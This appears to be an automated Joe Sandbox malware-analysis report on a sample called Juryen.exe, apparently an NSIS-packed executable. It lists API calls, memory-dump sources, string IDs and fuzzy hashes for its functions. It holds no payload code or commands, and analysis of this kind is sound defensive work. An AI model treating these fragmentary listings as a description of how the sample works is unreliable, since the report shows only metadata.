                                                                    • Opcode Fuzzy Hash: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                                                    • Instruction Fuzzy Hash: 94213B72D00119AFCB05DF98DE45AEEBBB5EB08300F14003AF945F62A0D7349D81DB98
                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 1F75715C
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1F75717F
                                                                      • Part of subcall function 1F7556D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 1F755702
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 1F7571A5
                                                                    • _free.LIBCMT ref: 1F7571B8
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 1F7571C7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                    • String ID:
                                                                    • API String ID: 336800556-0
                                                                    • Opcode ID: 865bbc0e05d9b8644c416bb6cc7b4ccca0079edd6b9087e577f47e8b2601b7f2
                                                                    • Instruction ID: 92153c0604365f275cbf65b6b4b2e057e78b3c87eeabd28f4cf766633f742e42
                                                                    • Opcode Fuzzy Hash: 865bbc0e05d9b8644c416bb6cc7b4ccca0079edd6b9087e577f47e8b2601b7f2
                                                                    • Instruction Fuzzy Hash: 2A01AC766052297F6B110AB66C8CDBFA96DDFC6BB0311012EFD08C7220EE619C1385F0
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,?,00000000,1F75636D,1F755713,00000000,?,1F752249,?,?,1F751D66,00000000,?,?,00000000), ref: 1F755B7F
                                                                    • _free.LIBCMT ref: 1F755BB4
                                                                    • _free.LIBCMT ref: 1F755BDB
                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F755BE8
                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F755BF1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free
                                                                    • String ID:
                                                                    • API String ID: 3170660625-0
                                                                    • Opcode ID: 3595b842fedb2da8524a5eb3ce44474e37a4dcfba0790c6818ec0e14983476a4
                                                                    • Instruction ID: ceb6ed226b0bcd0b646d94fb35ba96aa55c09c6f8b89e7da4e1c3e848e42f008
                                                                    • Opcode Fuzzy Hash: 3595b842fedb2da8524a5eb3ce44474e37a4dcfba0790c6818ec0e14983476a4
                                                                    • Instruction Fuzzy Hash: 7901C87A105712B7E20256347CCCD5F2A6A9FCA67C7210129F819DA271EF65F81B41A4
                                                                    APIs
                                                                    • GetDC.USER32(?), ref: 00401E76
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                                    • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401EF8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                    • String ID:
                                                                    • API String ID: 3808545654-0
                                                                    • Opcode ID: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                                    • Instruction ID: 1d77b42acd886a27ae9f5cf53f8bcf428a8cf24ec4295262a5ba191a384267e2
                                                                    • Opcode Fuzzy Hash: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                                    • Instruction Fuzzy Hash: 9E01B171950250EFEB005BB4AE8AADD3FB0AF59300F10497AF142BA1E2CAB804049B2C
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,1F7510DF,?,?,?,00000000), ref: 1F751E9A
                                                                    • lstrcatW.KERNEL32(?,?,?,1F7510DF,?,?,?,00000000), ref: 1F751EAC
                                                                    • lstrlenW.KERNEL32(?,?,1F7510DF,?,?,?,00000000), ref: 1F751EB3
                                                                    • lstrlenW.KERNEL32(?,?,1F7510DF,?,?,?,00000000), ref: 1F751EC8
                                                                    • lstrcatW.KERNEL32(?,1F7510DF,?,1F7510DF,?,?,?,00000000), ref: 1F751ED3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$lstrcat
                                                                    • String ID:
                                                                    • API String ID: 493641738-0
                                                                    • Opcode ID: 2163e86f95b7f2389b020ea241644b5d620b91aa4fd3402d4ad331b583f0025c
                                                                    • Instruction ID: 092baf31b29be7375fb7ed03193e8e9400497d8511b2a26ada60bb18f9e92451
                                                                    • Opcode Fuzzy Hash: 2163e86f95b7f2389b020ea241644b5d620b91aa4fd3402d4ad331b583f0025c
                                                                    • Instruction Fuzzy Hash: 8EF089265042207AD7212719ACC5EBF777CEFC9A71F44001EF50C831A0AB55686792B5
                                                                    APIs
                                                                    • _free.LIBCMT ref: 1F7591D0
                                                                      • Part of subcall function 1F75571E: HeapFree.KERNEL32(00000000,00000000,?,1F75924F,?,00000000,?,00000000,?,1F759276,?,00000007,?,?,1F757E5A,?), ref: 1F755734
                                                                      • Part of subcall function 1F75571E: GetLastError.KERNEL32(?,?,1F75924F,?,00000000,?,00000000,?,1F759276,?,00000007,?,?,1F757E5A,?,?), ref: 1F755746
                                                                    • _free.LIBCMT ref: 1F7591E2
                                                                    • _free.LIBCMT ref: 1F7591F4
                                                                    • _free.LIBCMT ref: 1F759206
                                                                    • _free.LIBCMT ref: 1F759218
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 96a08e67fa1ec594dbd50ee0349cdb8f7f957d2669c34a1f1eee702e7a0c78d0
                                                                    • Instruction ID: c76668b0bffd53bfcdcbba295b678d983610b22aa3c7da923cfec475219e4cb3
                                                                    • Opcode Fuzzy Hash: 96a08e67fa1ec594dbd50ee0349cdb8f7f957d2669c34a1f1eee702e7a0c78d0
                                                                    • Instruction Fuzzy Hash: 5DF036B1514360D7D650DB54F9C9C567BF9FA8D7347504C06F84ADB610DB35F890CAA0
                                                                    APIs
                                                                    • _free.LIBCMT ref: 1F75536F
                                                                      • Part of subcall function 1F75571E: HeapFree.KERNEL32(00000000,00000000,?,1F75924F,?,00000000,?,00000000,?,1F759276,?,00000007,?,?,1F757E5A,?), ref: 1F755734
                                                                      • Part of subcall function 1F75571E: GetLastError.KERNEL32(?,?,1F75924F,?,00000000,?,00000000,?,1F759276,?,00000007,?,?,1F757E5A,?,?), ref: 1F755746
                                                                    • _free.LIBCMT ref: 1F755381
                                                                    • _free.LIBCMT ref: 1F755394
                                                                    • _free.LIBCMT ref: 1F7553A5
                                                                    • _free.LIBCMT ref: 1F7553B6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 416cb5c9a57720d94c2cfc7576c886780940a22ac2b5909fb9e750eafc4bb238
                                                                    • Instruction ID: 644f1004da6ea12fe58d390b601531655cee87d52dc3461704f95c3639aa17b7
                                                                    • Opcode Fuzzy Hash: 416cb5c9a57720d94c2cfc7576c886780940a22ac2b5909fb9e750eafc4bb238
                                                                    • Instruction Fuzzy Hash: BAF0B274825335DBE6855F34A9C44483BB2A7DDA393010A0BF814D7361EB736A62DBC0
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user~1\AppData\Local\Temp\Juryen.exe,00000104), ref: 1F754C1D
                                                                    • _free.LIBCMT ref: 1F754CE8
                                                                    • _free.LIBCMT ref: 1F754CF2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                     • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                     • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _free$FileModuleName
                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\Juryen.exe
                                                                    • API String ID: 2506810119-3593836627
                                                                    • Opcode ID: b6da68f941daaaed8c9404d6c004008c4648042ae56e6c6cc2e980e922a60a8b
                                                                    • Instruction ID: 4b2cd616efb09929229a99be58845610a0bdf7d633c4f3c1278a1454991e70b4
                                                                    • Opcode Fuzzy Hash: b6da68f941daaaed8c9404d6c004008c4648042ae56e6c6cc2e980e922a60a8b
                                                                    • Instruction Fuzzy Hash: F13133B5B00358AFDB11CF99999499EBBFCEBC9320F10416BE90497320D671AA51CB90
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Timeout
                                                                    • String ID: !
                                                                    • API String ID: 1777923405-2657877971
                                                                    • Opcode ID: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                                                    • Instruction ID: 7915d77c0e8d2f35ba529c4d8f0c1bf85837a2641dbb4ead1ffb962ccc12b17a
                                                                    • Opcode Fuzzy Hash: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                                                    • Instruction Fuzzy Hash: CC218071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF505B61D0D7B88941DB98
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                                                    • wsprintfW.USER32 ref: 00404E17
                                                                    • SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                    • String ID: %u.%u%s%s
                                                                    • API String ID: 3540041739-3551169577
                                                                    • Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                    • Instruction ID: 531ff4d773969165704d770d32cd75e70745a6e311be36c98e560407ed735fca
                                                                    • Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                    • Instruction Fuzzy Hash: 1711EB73A0422837DB0056ADAC46E9E3698DF85374F250237FA66F21D5D978CC2142D8
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,1F756FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 1F758731
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 1F7587BA
                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 1F7587CC
                                                                    • __freea.LIBCMT ref: 1F7587D5
                                                                      • Part of subcall function 1F7556D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 1F755702
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                     • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                     • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                    • String ID:
                                                                    • API String ID: 2652629310-0
                                                                    • Opcode ID: d1b08ef9d20822cc093f67b78d325892cdc5f44976d55ca813eeef503b56d7a5
                                                                    • Instruction ID: d8fad2fcd6915b15119bb719e01bbca3ef40d5cc8aebc29cd34db65e0f2dac0b
                                                                    • Opcode Fuzzy Hash: d1b08ef9d20822cc093f67b78d325892cdc5f44976d55ca813eeef503b56d7a5
                                                                    • Instruction Fuzzy Hash: 98319E72A0021AABDF15CFB4DC84EEF7BA5EB48720F150529EC04DB1A0E735E965CB90
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,1F751D66,00000000,00000000,?,1F755C88,1F751D66,00000000,00000000,00000000,?,1F755E85,00000006,FlsSetValue), ref: 1F755D13
                                                                    • GetLastError.KERNEL32(?,1F755C88,1F751D66,00000000,00000000,00000000,?,1F755E85,00000006,FlsSetValue,1F75E190,FlsSetValue,00000000,00000364,?,1F755BC8), ref: 1F755D1F
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,1F755C88,1F751D66,00000000,00000000,00000000,?,1F755E85,00000006,FlsSetValue,1F75E190,FlsSetValue,00000000), ref: 1F755D2D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                     • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                     • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 3177248105-0
                                                                    • Opcode ID: 5a9657bc460d4ef34a550e7aa85b423915f40f608400b33ce27c62480fb5d4e0
                                                                    • Instruction ID: b41d85bae7df3a9be55d5d9caa92a71b1bf44319300b9b99ea8e3665ca91e8e1
                                                                    • Opcode Fuzzy Hash: 5a9657bc460d4ef34a550e7aa85b423915f40f608400b33ce27c62480fb5d4e0
                                                                    • Instruction Fuzzy Hash: AA01A737615336ABC7114A789CCCA467758AFC97B57110631F909DB160DB31E866CAE0
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,00000000,0040321C,00000001), ref: 00403051
                                                                    • GetTickCount.KERNEL32 ref: 0040306F
                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                                                    • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                    • String ID:
                                                                    • API String ID: 2102729457-0
                                                                    • Opcode ID: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                                                    • Instruction ID: 1fe6cbc8f6a725ad0ac4e372fd1d3cf1f1d396d39c9c490f6de0fad46aa3fa9f
                                                                    • Opcode Fuzzy Hash: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                                                    • Instruction Fuzzy Hash: 1CF05431602621ABC6316F54FD08A9B7BA9FB44B13F41087AF045B11A9CB7948828B9C
                                                                    APIs
                                                                    • _free.LIBCMT ref: 1F75655C
                                                                      • Part of subcall function 1F7562BC: IsProcessorFeaturePresent.KERNEL32(00000017,1F7562AB,00000000,?,?,?,?,00000016,?,?,1F7562B8,00000000,00000000,00000000,00000000,00000000), ref: 1F7562BE
                                                                      • Part of subcall function 1F7562BC: GetCurrentProcess.KERNEL32(C0000417), ref: 1F7562E0
                                                                      • Part of subcall function 1F7562BC: TerminateProcess.KERNEL32(00000000), ref: 1F7562E7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                     • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                     • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                    • String ID: *?$.
                                                                    • API String ID: 2667617558-3972193922
                                                                    • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                    • Instruction ID: 99666b8531a2374fbb3c040ee1a2d27408a49e0ec1c8998a7571f9b9a1d7446d
                                                                    • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                    • Instruction Fuzzy Hash: DE5193B5E0021ADFDF14CFA8EC80AADBBF5EF48314F248169D454E7364E675AA01CB50
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                     • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                     • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID: : $Se.
                                                                    • API String ID: 4218353326-4089948878
                                                                    • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                    • Instruction ID: 88aedbf7b9fe7b122b69a2868c2595e9b2920f130c3f0d347d7752d143ef703b
                                                                    • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                    • Instruction Fuzzy Hash: CA11CA75A00349AEDB11CFACE850BDDFBFCEF19214F104456E545E7262E6706B02C765
                                                                    APIs
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 1F752903
                                                                      • Part of subcall function 1F7535D2: RaiseException.KERNEL32(?,?,?,1F752925,00000000,00000000,00000000,?,?,?,?,?,1F752925,?,1F7621B8), ref: 1F753632
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 1F752920
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                     • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                     • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                    • String ID: Unknown exception
                                                                    • API String ID: 3476068407-410509341
                                                                    • Opcode ID: a4aa99d2290381f2799a51ad19c9f0de1be5c9052df7b2aac4990d8f8a4edbe3
                                                                    • Instruction ID: 6b7c5ed1573aebde27ac78c3a2cecd53acc65987e6126429fdade25077119814
                                                                    • Opcode Fuzzy Hash: a4aa99d2290381f2799a51ad19c9f0de1be5c9052df7b2aac4990d8f8a4edbe3
                                                                    • Instruction Fuzzy Hash: 59F0AF3CA0830DB78B04AAB5FC5899D776C9A14650F904664B924AA0B0FF31FA26C6C1
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 00405569
                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004055BA
                                                                      • Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                    • String ID:
                                                                    • API String ID: 3748168415-3916222277
                                                                    • Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                    • Instruction ID: e9ac82e17096a71ceb81da4f6da7be56a9305aae285fff99253fdd5fe3b389a1
                                                                    • Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                    • Instruction Fuzzy Hash: 6B017171200609BFDF315F11DD84AAB3A66FB84754F100037FA00B51E5C7BA8D52AE69
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 0040607E
                                                                    • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,0040351A,00436000,00436800,00436800,00436800,00436800,00436800,00436800,00403806), ref: 00406099
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CountFileNameTempTick
                                                                    • String ID: nsa
                                                                    • API String ID: 1716503409-2209301699
                                                                    • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                    • Instruction ID: 6ac4114a0c6328616d68196ae331b9967fc339ed7b26ce04d623ba2336a1d7a6
                                                                    • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                    • Instruction Fuzzy Hash: D4F09076B40204BBEB00CF69ED05F9FB7ACEB95750F11803AFA01F7180E6B099548768
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                                                    • Instruction ID: 57bf2fd90c69a3a2134d3ca1d9604f9a54cf20ddad3feead76618616929b2f58
                                                                    • Opcode Fuzzy Hash: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                                                    • Instruction Fuzzy Hash: 17A15471E04229CBDF28CFA8C8546ADBBB1FF44305F10846ED816BB281D7786A86DF45
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                     • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
